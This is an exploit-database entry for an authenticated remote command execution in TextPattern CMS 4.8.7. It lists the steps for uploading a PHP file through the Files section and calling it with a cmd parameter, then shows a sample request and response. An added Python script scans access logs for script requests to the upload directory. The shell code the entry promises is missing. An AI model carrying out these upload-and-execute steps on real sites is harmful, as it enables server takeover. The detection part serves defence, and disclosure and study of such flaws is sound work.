TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)

Vulnerability Overview

EDB-ID: 49996
Author: Mert Das (mertpreter@gmail.com)
Type: Webapps
Platform: PHP
Date: 2021-06-14
Vulnerable application: TextPattern CMS 4.8.7

Affected Scope

Affected version: TextPattern CMS 4.8.7
Test environment: Xampp

Remediation

Software link: TextPattern CMS
Official website: TextPattern

PoC Code

```php
Exploit Title : TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)
Date : 2021/09/06
Exploit Author : Mert Das mertpreter@gmail.com
Software Link : https://textpattern.com/file_download/113/textpattern-4.8.7.zip
Software web : https://textpattern.com/
Tested on: Server : Xampp

First of all we should use file upload section to upload our shell.
Our shell contains this malicious code:

1) Go to content section -
2) Click Files and upload malicious php file.
3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode;

After upload our file our request and response is like below :

Cookie: tap_login_public=18e9b4f4a21adm1n; language=en-gb; currency=GBP; PHPSESSID=cctbu6sj8571j276vp7g8ab7gi
Upgrade-Insecure-Requests: 1

Response:

HTTP/1.1 200 OK
Date: Thu, 10 Jun 2021 00:32:41 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
X-Powered-By: PHP/7.4.20
Content-Length: 22
Connection: close
Content-Type: text/html; charset=UTF-8

pc\merdas
```
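
From the defender's side, the request in step 3 leaves a recognisable trace in the web server's access log: a script file being requested from the file-upload directory. The following is an added example (not part of the original exploit entry) that scans Apache-format log lines for that pattern; the sample log lines, the extension list and the function name `find_upload_script_hits` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote, parse_qs

# Upload directory named in the write-up (yourserver/textpattern/files/).
UPLOAD_DIR = "/textpattern/files/"
# Extensions commonly mapped to the PHP handler; this list is an assumption.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Apache common/combined log prefix: host ident user [time] "METHOD target PROTO" status size
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')

# Constructed sample lines (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jun/2021:00:31:02 +0000] "POST /textpattern/index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/Jun/2021:00:32:41 +0000] "GET /textpattern/files/report.php?cmd=x HTTP/1.1" 200 22',
    '198.51.100.4 - - [10/Jun/2021:00:40:10 +0000] "GET /textpattern/files/manual.pdf HTTP/1.1" 200 88211',
    '198.51.100.9 - - [10/Jun/2021:00:41:00 +0000] "GET /textpattern/files/old.PHTML HTTP/1.1" 403 199',
]

def find_upload_script_hits(lines):
    """Return requests whose path is a script file inside the upload directory."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not an access-log request line
        client, when, method, target, status = m.groups()
        url = urlsplit(target)
        path = unquote(url.path)  # decode percent-encoding before matching
        if UPLOAD_DIR not in path.lower() or not SCRIPT_EXT.search(path):
            continue
        hits.append({
            "client": client,
            "time": when,
            "method": method,
            "path": path,
            # Parameter names only; the values are not needed to raise the alert.
            "params": sorted(parse_qs(url.query, keep_blank_values=True)),
            # A 200 means the server handled the script instead of refusing it.
            "served": status == "200",
        })
    return hits

if __name__ == "__main__":
    for hit in find_upload_script_hits(SAMPLE_LOG):
        print(hit)
```

A hit with `served` set to `True` is the case to investigate first, since files in that directory are meant to be downloaded rather than run by the PHP handler.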